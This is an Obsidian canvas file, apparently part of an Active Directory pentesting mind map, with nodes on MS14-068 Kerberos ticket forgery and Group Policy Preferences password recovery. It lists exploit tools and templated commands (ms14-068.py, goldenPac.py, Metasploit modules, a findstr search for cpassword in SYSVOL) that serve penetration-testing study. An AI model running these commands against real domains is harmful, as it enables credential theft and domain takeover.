{
	"nodes":[
		{"id":"e80036f00f073770","type":"group","x":-1320,"y":-1120,"width":3800,"height":5040,"color":"#aa8c46","label":"NEED CREDENTIALS VULNS"},
		{"id":"e4c6f9b81f56c549","type":"group","x":3520,"y":3154,"width":1080,"height":766,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"380012add55daf25","type":"group","x":3520,"y":1074,"width":1080,"height":763,"color":"1","label":"DOMAIN ADMIN"},
		{"id":"79e4808e292e1253","type":"group","x":-3040,"y":1020,"width":1080,"height":760,"label":"NO CREDENTIALS"},
		{"id":"371121d4f6044444","type":"group","x":3520,"y":34,"width":1080,"height":760,"color":"#e178e1","label":"GOT LOCAL ADMIN"},
		{"id":"90d16a8319fb813a","type":"group","x":3520,"y":2074,"width":1080,"height":760,"color":"#324bff","label":"DACL ABUSE"},
		{"id":"956ad0fbaec5c983","type":"group","x":3520,"y":-1066,"width":1080,"height":760,"color":"6","label":"LATERAL MOVE"},
		{"id":"70b5896f26eafe19","type":"file","file":"INTERACTIVE-MAP.canvas","x":-2960,"y":1100,"width":920,"height":600},
		{"id":"6c5c54084e1e6b67","type":"file","file":"ATTACKS/LATERAL MOVE.canvas","x":3600,"y":-984,"width":920,"height":600,"color":"6"},
		{"id":"2a711b4e003bc7a1","type":"file","file":"ATTACKS/GOT LOCAL ADMIN.canvas","x":3600,"y":114,"width":920,"height":600,"color":"#e178e1"},
		{"id":"fa6578ff74286669","type":"file","file":"ATTACKS/DOMAIN ADMIN.canvas","x":3600,"y":1154,"width":920,"height":600,"color":"1"},
		{"id":"6cc3a6d4db728692","type":"file","file":"ATTACKS/DACL ABUSE.canvas","x":3600,"y":2154,"width":920,"height":600,"color":"#324bff"},
		{"id":"5c93dd0c20f055d9","type":"file","file":"ATTACKS/MITM (LISTEN & RELAY).canvas","x":3600,"y":3234,"width":920,"height":600,"color":"3"},
		{"id":"577520d608f6d31d","type":"text","text":"## CVE-2014-6324 \n\n\n>[!info] Theory\n>- [MS14-068](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/ms14-068)\n\n\n>[!example] Tools\n>- [findsmp2uptime](https://github.com/SpiderLabs/Responder/blob/master/tools/FindSMB2UPTime.py)\n>- [ms14-068 exploit script](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py)\n>- [GoldenPac](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py)\n\n\n```shell\n#Commands\nâšª findSMB2UPTime.py '<ip>'\nâšª ms14-068.py -u '<user>'@'<domain>' -p '<password>' -s '<user_sid>' -d '<dc_fqdn>'\nðŸŸ£ goldenPac.py -dc-ip '<dc_ip>' '<domain>'/'<user>':'<password>'@'target'\nâ“‚ï¸ msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum\n```","x":-640,"y":-800,"width":2040,"height":560},
		{"id":"e27b8b908d1d493d","type":"text","text":"# CVE-2014-1812\n\n>[!info] Theory\n>- [Group Policy Preferences Password Elevation of Privilege Vulnerability](https://www.cvedetails.com/microsoft-bulletin/MS14-025)\n>- [Group policy preferences THR](https://www.thehacker.recipes/ad/movement/credentials/dumping/group-policies-preferences#theory)\n\n\n>[!example] Tools\n>- [Get GPP password](https://github.com/fortra/impacket/blob/master/examples/Get-GPPPassword.py) \n\n\n```shell\n#Commands\nðŸ”µ findstr /S /I cpassword \\\\<domain_fqdn>\\sysvol\\<domain_fqdn>\\policies\\*.xml\nðŸŸ£ Get-GPPPassword.py '<domain>'/'<user>':'<password>'@'<dc_fqdn>'\nâ“‚ï¸ msf> use auxiliary/scanner/smb/smb_enum_gpp\n\n```","x":-640,"y":-141,"width":2040,"height":855}
	],
	"edges":[
		{"id":"ad6e079305a57524","fromNode":"79e4808e292e1253","fromSide":"right","toNode":"e80036f00f073770","toSide":"left"},
		{"id":"40bdaa53b01a98a0","fromNode":"e80036f00f073770","fromSide":"right","toNode":"956ad0fbaec5c983","toSide":"left","color":"6"},
		{"id":"c13109f4bff5c78d","fromNode":"e80036f00f073770","fromSide":"right","toNode":"371121d4f6044444","toSide":"left","color":"#e178ff"},
		{"id":"40063f858e210cb0","fromNode":"e80036f00f073770","fromSide":"right","toNode":"380012add55daf25","toSide":"left","color":"1"},
		{"id":"a581db0433ce8335","fromNode":"e80036f00f073770","fromSide":"right","toNode":"90d16a8319fb813a","toSide":"left","color":"#324bff"},
		{"id":"5fdb574a0b62c620","fromNode":"e80036f00f073770","fromSide":"right","toNode":"e4c6f9b81f56c549","toSide":"left","color":"3"}
	]
}